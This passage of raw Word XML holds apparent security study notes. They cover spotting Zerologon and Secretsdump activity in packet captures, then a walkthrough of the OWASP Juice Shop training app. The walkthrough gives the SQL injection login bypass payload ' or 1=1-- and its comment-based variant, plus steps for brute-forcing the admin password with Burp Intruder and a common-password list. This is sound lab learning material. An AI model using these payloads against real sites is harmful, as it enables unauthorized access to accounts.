      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Threat Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87EEE1" w14:textId="1A552FFE" w:rsidR="00DF00E5" w:rsidRPr="0084205E" w:rsidRDefault="00DF00E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verify nature of attacks via PCAP analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511EE12A" w14:textId="167C01C9" w:rsidR="00DF00E5" w:rsidRPr="0084205E" w:rsidRDefault="00DF00E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Zerologon’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use of numerous RPC connections and DCERPC requests to change machine account password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D3830" w14:textId="64C87359" w:rsidR="00DF00E5" w:rsidRPr="0084205E" w:rsidRDefault="00DF00E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> SMB Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDF944" w14:textId="21724247" w:rsidR="00DF00E5" w:rsidRPr="0084205E" w:rsidRDefault="00DF00E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">SMB2/3 traffic and DRSUAPI traffic </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> indicator of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use to dump hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765643A" w14:textId="72829F2B" w:rsidR="00DF00E5" w:rsidRPr="0084205E" w:rsidRDefault="00DF00E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unique artifacts of attack</w:t>
      </w:r>
      <w:r w:rsidR="00AC1C31" w:rsidRPr="0084205E">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A39BB" w14:textId="119C2381" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="00AC1C31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID and isolate threats, report incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AD78B" w14:textId="712A51ED" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F95E323" w14:textId="3437A13D" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3383C4EF" w14:textId="67914BC6" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053924C0" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Start with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, without Intercept on – walk the site to collect request-responses – form of reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C439C0F" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check comments for potential email addresses of site members, comments that provide insight into user interests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6E223" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Input “a” into search bar and check URL – search parameter will precede input with &lt;search param&gt;=&lt;search input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE27C4" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>INJECTION VULNERABILITIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A855E2" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dangerous due to cause of downtime and/or loss of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F3841D" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID injection points within a web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14D687" w14:textId="1AF429CC" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Simple as many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> with an error message of sorts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4427D" w14:textId="2BDA2374" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SQL Injection – malicious/malformed query to retrieve or tamper data from a database, log into accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A21F66E" w14:textId="264C8111" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command Injection – user input run as system commands, allowing tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600037A0" w14:textId="289CECDA" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Seen in applications that perform misconfigured ping tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0841E753" w14:textId="27371F78" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Email Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF01E2" w14:textId="298C46A8" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users can send email messages without authorization by email server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F533B" w14:textId="1701519B" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Occur when extra data is added to fields which are not interpreted correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A462F4" w14:textId="3C6A14EF" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="003833F5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Intercept login attempt with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and exchange email submission with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘ or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58840578" w14:textId="685E404C" w:rsidR="003833F5" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>“’” will close brackets in SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D59ECC" w14:textId="66E2D45F" w:rsidR="00197063" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“OR” is an SQL Boolean which will return true if either side is true, as 1=1 is true, the whole statement is true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA21FF" w14:textId="6D787F54" w:rsidR="00197063" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>This tells the server the email is valid and logs into user id 0, the admin account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9A81C" w14:textId="7F421347" w:rsidR="00197063" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">“- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-“ comments</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> out data, any restrictions on the login will no longer work as they are interpreted as a comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EA97E3" w14:textId="71E3A4E8" w:rsidR="00197063" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept another login attempt and edit a correct email (found through reading item comments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A4035" w14:textId="19D491DA" w:rsidR="00197063" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Because email is confirmed true, adding </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>- -“ to the end of the email will bypass login system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC1A66" w14:textId="0651F9D8" w:rsidR="00197063" w:rsidRPr="0084205E" w:rsidRDefault="00197063" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>1=1 can be used when email/username is not known or invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA78F0" w14:textId="64691912" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXPLOITING AUTHENTICATION THROUGH DIFFERENT FLAWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA9EC0" w14:textId="6C6CCB09" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mechanisms vulnerable to manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B615C7" w14:textId="1645739E" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak passwords in high privileged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01713B82" w14:textId="14808369" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Forgotten password pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E01FA" w14:textId="120D9A0F" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept admin login attempt and forward attempt to Intruder for brute-force password attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBF722" w14:textId="740400B7" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sniper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFE0A5" w14:textId="5F293755" w:rsidR="00353EFF" w:rsidRPr="0084205E" w:rsidRDefault="00353EFF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Best1050</w:t>
      </w:r>
      <w:r w:rsidR="005C1A6E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">.txt from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C1A6E" w:rsidRPr="0084205E">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C1A6E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C1A6E" w:rsidRPr="0084205E">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C1A6E" w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C8E7F" w14:textId="1BCE330B" w:rsidR="005C1A6E" w:rsidRPr="0084205E" w:rsidRDefault="005C1A6E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/Passwords/Common-Credentials/best1050.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088EF15" w14:textId="56095DAD" w:rsidR="005C1A6E" w:rsidRPr="0084205E" w:rsidRDefault="005C1A6E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>200 OK result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B9741" w14:textId="5D2F7714" w:rsidR="005C1A6E" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="005C1A6E" w:rsidRPr="0084205E">
        <w:t>ogin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BB4DD" w14:textId="05EAE092" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reset Password Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB606BA" w14:textId="7DB948AF" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
